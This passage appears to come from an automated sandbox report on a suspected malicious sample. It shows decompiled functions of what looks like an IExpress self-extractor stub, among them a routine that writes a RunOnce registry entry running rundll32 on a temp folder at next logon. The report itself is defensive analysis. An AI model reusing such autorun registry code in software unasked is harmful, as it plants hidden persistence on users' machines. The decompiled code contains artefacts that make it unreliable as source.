                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040427a
                                                                                                                                                                                                                                    0x00404280
                                                                                                                                                                                                                                    0x00404285
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040428d
                                                                                                                                                                                                                                    0x00404293
                                                                                                                                                                                                                                    0x004042e6
                                                                                                                                                                                                                                    0x004042e9
                                                                                                                                                                                                                                    0x004042ef
                                                                                                                                                                                                                                    0x004042f4
                                                                                                                                                                                                                                    0x004042f7
                                                                                                                                                                                                                                    0x00404300
                                                                                                                                                                                                                                    0x00404307
                                                                                                                                                                                                                                    0x0040430e
                                                                                                                                                                                                                                    0x00404315
                                                                                                                                                                                                                                    0x0040431c
                                                                                                                                                                                                                                    0x00404322
                                                                                                                                                                                                                                    0x00404326
                                                                                                                                                                                                                                    0x0040432d
                                                                                                                                                                                                                                    0x0040432d
                                                                                                                                                                                                                                    0x0040432f
                                                                                                                                                                                                                                    0x00404334
                                                                                                                                                                                                                                    0x00404343
                                                                                                                                                                                                                                    0x00404349
                                                                                                                                                                                                                                    0x0040434d
                                                                                                                                                                                                                                    0x00404354
                                                                                                                                                                                                                                    0x00404354
                                                                                                                                                                                                                                    0x0040435d
                                                                                                                                                                                                                                    0x0040436e
                                                                                                                                                                                                                                    0x0040436e
                                                                                                                                                                                                                                    0x0040437d
                                                                                                                                                                                                                                    0x00404383
                                                                                                                                                                                                                                    0x00404387
                                                                                                                                                                                                                                    0x0040438e
                                                                                                                                                                                                                                    0x0040438e
                                                                                                                                                                                                                                    0x00404387
                                                                                                                                                                                                                                    0x00404391
                                                                                                                                                                                                                                    0x00404399
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404295
                                                                                                                                                                                                                                    0x0040429f
                                                                                                                                                                                                                                    0x004042a5
                                                                                                                                                                                                                                    0x004042aa
                                                                                                                                                                                                                                    0x004042aa
                                                                                                                                                                                                                                    0x004042ad
                                                                                                                                                                                                                                    0x004042ad
                                                                                                                                                                                                                                    0x004042af
                                                                                                                                                                                                                                    0x004042b0
                                                                                                                                                                                                                                    0x004042b6
                                                                                                                                                                                                                                    0x004042c2
                                                                                                                                                                                                                                    0x004042c8
                                                                                                                                                                                                                                    0x004042ce
                                                                                                                                                                                                                                    0x004042e4
                                                                                                                                                                                                                                    0x004042e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004042ce

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00404236
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0040424C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00404263
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0040427A
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,004088C0,?,00000001), ref: 0040429F
                                                                                                                                                                                                                                    • CharPrevA.USER32(004088C0,00811181,?,00000001), ref: 004042C2
                                                                                                                                                                                                                                    • CharPrevA.USER32(004088C0,00000000,?,00000001), ref: 004042D6
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00404391
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 004043A5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                    • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                    • Opcode ID: 62c8c5832672bbbd4f51870b14db4df699431c97bf1b6f77f9cc7bfa0f1f7c63
                                                                                                                                                                                                                                    • Instruction ID: 0b25c262f151fa20e67494b359207c62db184f6ba7d2e960933b952b011f601d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62c8c5832672bbbd4f51870b14db4df699431c97bf1b6f77f9cc7bfa0f1f7c63
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6841D2B4A00304AFE711AF60DE84A6E7BA4EB85344F54417EEA81B73D1CB7C8D05876D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00402773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E00402773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x408004; // 0x8f135e3b
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00401781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0040658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0040658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x401140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00401680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00406CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                                                    0x00402773
                                                                                                                                                                                                                                    0x0040277e
                                                                                                                                                                                                                                    0x00402785
                                                                                                                                                                                                                                    0x0040278a
                                                                                                                                                                                                                                    0x0040278d
                                                                                                                                                                                                                                    0x00402790
                                                                                                                                                                                                                                    0x00402792
                                                                                                                                                                                                                                    0x00402798
                                                                                                                                                                                                                                    0x0040279d
                                                                                                                                                                                                                                    0x004028b2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004027a3
                                                                                                                                                                                                                                    0x004027a3
                                                                                                                                                                                                                                    0x004027af
                                                                                                                                                                                                                                    0x004027c2
                                                                                                                                                                                                                                    0x004027c8
                                                                                                                                                                                                                                    0x004027cd
                                                                                                                                                                                                                                    0x004027d5
                                                                                                                                                                                                                                    0x004028b7
                                                                                                                                                                                                                                    0x004028b9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004027db
                                                                                                                                                                                                                                    0x004027dd
                                                                                                                                                                                                                                    0x004028aa
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004027e3
                                                                                                                                                                                                                                    0x004027e3
                                                                                                                                                                                                                                    0x004027ec
                                                                                                                                                                                                                                    0x004027f8
                                                                                                                                                                                                                                    0x00402803
                                                                                                                                                                                                                                    0x0040280b
                                                                                                                                                                                                                                    0x00402831
                                                                                                                                                                                                                                    0x004028c3
                                                                                                                                                                                                                                    0x004028c9
                                                                                                                                                                                                                                    0x004028cd
                                                                                                                                                                                                                                    0x00402837
                                                                                                                                                                                                                                    0x0040285a
                                                                                                                                                                                                                                    0x0040285c
                                                                                                                                                                                                                                    0x00402865
                                                                                                                                                                                                                                    0x00402892
                                                                                                                                                                                                                                    0x00402895
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402867
                                                                                                                                                                                                                                    0x00402878
                                                                                                                                                                                                                                    0x0040288c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040287a
                                                                                                                                                                                                                                    0x00402880
                                                                                                                                                                                                                                    0x00402885
                                                                                                                                                                                                                                    0x00402897
                                                                                                                                                                                                                                    0x00402899
                                                                                                                                                                                                                                    0x00402899
                                                                                                                                                                                                                                    0x00402878
                                                                                                                                                                                                                                    0x00402865
                                                                                                                                                                                                                                    0x004028a0
                                                                                                                                                                                                                                    0x004028bf
                                                                                                                                                                                                                                    0x004028c1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004028c1
                                                                                                                                                                                                                                    0x00402831
                                                                                                                                                                                                                                    0x004027dd
                                                                                                                                                                                                                                    0x004027d5
                                                                                                                                                                                                                                    0x004028e5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharUpperA.USER32(8F135E3B,00000000,00000000,00000000), ref: 004027A8
                                                                                                                                                                                                                                    • CharNextA.USER32(0000054D), ref: 004027B5
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 004027BC
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402829
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402852
                                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402870
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004028A0
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 004028AA
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 004028B9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 004027E4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                    • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                    • Opcode ID: e046747f357c46f050dce2852b115ef3c86e064c1e2556bd9d83d58dfc6506bf
                                                                                                                                                                                                                                    • Instruction ID: b29046f07952b478a6343dcd1b107d04b4820205fbcf11bc0dc1fa30adae9d17
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e046747f357c46f050dce2852b115ef3c86e064c1e2556bd9d83d58dfc6506bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA41F87590012C6FDB249F549D49AEA77BCEF15300F0080BAF945F2190CBB44E968FA9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00402267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E00402267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x408004; // 0x8f135e3b
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x408530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0040658A( &_v268, 0x104, 0x401140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E0040171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00406CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                                                    0x00402272
                                                                                                                                                                                                                                    0x00402277
                                                                                                                                                                                                                                    0x00402279
                                                                                                                                                                                                                                    0x00402283
                                                                                                                                                                                                                                    0x00402289
                                                                                                                                                                                                                                    0x004022ab
                                                                                                                                                                                                                                    0x004022b1
                                                                                                                                                                                                                                    0x004022c4
                                                                                                                                                                                                                                    0x004022e0
                                                                                                                                                                                                                                    0x004022e6
                                                                                                                                                                                                                                    0x004022f5
                                                                                                                                                                                                                                    0x0040230d
                                                                                                                                                                                                                                    0x0040231c
                                                                                                                                                                                                                                    0x0040231c
                                                                                                                                                                                                                                    0x00402321
                                                                                                                                                                                                                                    0x0040233a
                                                                                                                                                                                                                                    0x00402342
                                                                                                                                                                                                                                    0x00402348
                                                                                                                                                                                                                                    0x0040234b
                                                                                                                                                                                                                                    0x0040234c
                                                                                                                                                                                                                                    0x0040234c
                                                                                                                                                                                                                                    0x0040234e
                                                                                                                                                                                                                                    0x0040234f
                                                                                                                                                                                                                                    0x0040236e
                                                                                                                                                                                                                                    0x0040236e
                                                                                                                                                                                                                                    0x0040237a
                                                                                                                                                                                                                                    0x00402380
                                                                                                                                                                                                                                    0x00402380
                                                                                                                                                                                                                                    0x00402381
                                                                                                                                                                                                                                    0x00402381
                                                                                                                                                                                                                                    0x0040238f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 004022A3
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 004022D8
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004022F5
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402305
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0040236E
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040237A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00402321
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00402299
                                                                                                                                                                                                                                    • wextract_cleanup0, xrefs: 0040227C, 004022CD, 00402363
                                                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0040232D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                    • API String ID: 3027380567-2554356261
                                                                                                                                                                                                                                    • Opcode ID: 247cee02729445f1a6684307d51db0c04144f96146b3de10c2f9ee9ee34981a8
                                                                                                                                                                                                                                    • Instruction ID: 8d6967f2b6b69c3bcd6c1b378378b2e216aa965ec765d16025e56e3eb759036c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 247cee02729445f1a6684307d51db0c04144f96146b3de10c2f9ee9ee34981a8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E31C871A002186BDB219F61DD49FDB777CEB54704F0001FAB94DB61D1DA786F88CA54
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00403100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E00403100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x408590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x408590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E004043D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x408d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x4088b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E004030C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                                                    0x00403108
                                                                                                                                                                                                                                    0x0040310b
                                                                                                                                                                                                                                    0x004031b7
                                                                                                                                                                                                                                    0x004031ca
                                                                                                                                                                                                                                    0x004031d0
                                                                                                                                                                                                                                    0x004031d0
                                                                                                                                                                                                                                    0x004031da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004031da
                                                                                                                                                                                                                                    0x00403111
                                                                                                                                                                                                                                    0x00403114
                                                                                                                                                                                                                                    0x00403136
                                                                                                                                                                                                                                    0x00403136
                                                                                                                                                                                                                                    0x00403138
                                                                                                                                                                                                                                    0x0040313b
                                                                                                                                                                                                                                    0x00403141
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403143
                                                                                                                                                                                                                                    0x00403116
                                                                                                                                                                                                                                    0x0040311b
                                                                                                                                                                                                                                    0x0040314b
                                                                                                                                                                                                                                    0x00403151
                                                                                                                                                                                                                                    0x00403158
                                                                                                                                                                                                                                    0x0040316a
                                                                                                                                                                                                                                    0x00403176
                                                                                                                                                                                                                                    0x0040317d
                                                                                                                                                                                                                                    0x0040318b
                                                                                                                                                                                                                                    0x0040319e
                                                                                                                                                                                                                                    0x004031a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004031ad
                                                                                                                                                                                                                                    0x00403120
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040312a
                                                                                                                                                                                                                                    0x00403134
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403134
                                                                                                                                                                                                                                    0x0040312c
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0040313B
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0040314B
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 0040316A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 00403176
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0040317D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 00403185
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 00403190
                                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,004030C0), ref: 004031A3
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 004031CA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 3785188418-612509477
                                                                                                                                                                                                                                    • Opcode ID: 867529428936b8af0a001c92f2b8928eb253d54033c5a874c9100fdf34310dde
                                                                                                                                                                                                                                    • Instruction ID: 246b5d21e6c1ac9ca4eb47d67caf4067a6fe804b44cd1f9aeadbe74bb776ad20
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 867529428936b8af0a001c92f2b8928eb253d54033c5a874c9100fdf34310dde
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911B131204211BBDB115F64AE0CB5B3E68EB4E722F100636F855B92E0DBB89A51C78E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004018A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                    			E004018A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x408004; // 0x8f135e3b
				_v8 = _t23 ^ _t53;
				_t25 =  *0x408128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00406CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E004017EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x408128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x408128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                                                    0x004018a3
                                                                                                                                                                                                                                    0x004018a3
                                                                                                                                                                                                                                    0x004018ab
                                                                                                                                                                                                                                    0x004018b2
                                                                                                                                                                                                                                    0x004018b5
                                                                                                                                                                                                                                    0x004018be
                                                                                                                                                                                                                                    0x004018c0
                                                                                                                                                                                                                                    0x004018c6
                                                                                                                                                                                                                                    0x004018c7
                                                                                                                                                                                                                                    0x004018ca
                                                                                                                                                                                                                                    0x004018cf
                                                                                                                                                                                                                                    0x004019c9
                                                                                                                                                                                                                                    0x004019d8
                                                                                                                                                                                                                                    0x004019d8
                                                                                                                                                                                                                                    0x004018df
                                                                                                                                                                                                                                    0x004019b8
                                                                                                                                                                                                                                    0x004019bd
                                                                                                                                                                                                                                    0x004019bf
                                                                                                                                                                                                                                    0x004019bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004019bd
                                                                                                                                                                                                                                    0x004018fa
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401912
                                                                                                                                                                                                                                    0x004019aa
                                                                                                                                                                                                                                    0x004019ad
                                                                                                                                                                                                                                    0x004019b3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401927
                                                                                                                                                                                                                                    0x00401927
                                                                                                                                                                                                                                    0x00401932
                                                                                                                                                                                                                                    0x00401936
                                                                                                                                                                                                                                    0x004019a9
                                                                                                                                                                                                                                    0x004019a9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004019a9
                                                                                                                                                                                                                                    0x0040194c
                                                                                                                                                                                                                                    0x004019a2
                                                                                                                                                                                                                                    0x004019a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040196e
                                                                                                                                                                                                                                    0x00401970
                                                                                                                                                                                                                                    0x00401999
                                                                                                                                                                                                                                    0x0040199c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040199c
                                                                                                                                                                                                                                    0x00401972
                                                                                                                                                                                                                                    0x00401972
                                                                                                                                                                                                                                    0x00401975
                                                                                                                                                                                                                                    0x00401984
                                                                                                                                                                                                                                    0x00401985
                                                                                                                                                                                                                                    0x0040198a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040198c
                                                                                                                                                                                                                                    0x00401991
                                                                                                                                                                                                                                    0x00401996
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401996
                                                                                                                                                                                                                                    0x0040194c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004017EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004018DD), ref: 0040181A
                                                                                                                                                                                                                                      • Part of subcall function 004017EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040182C
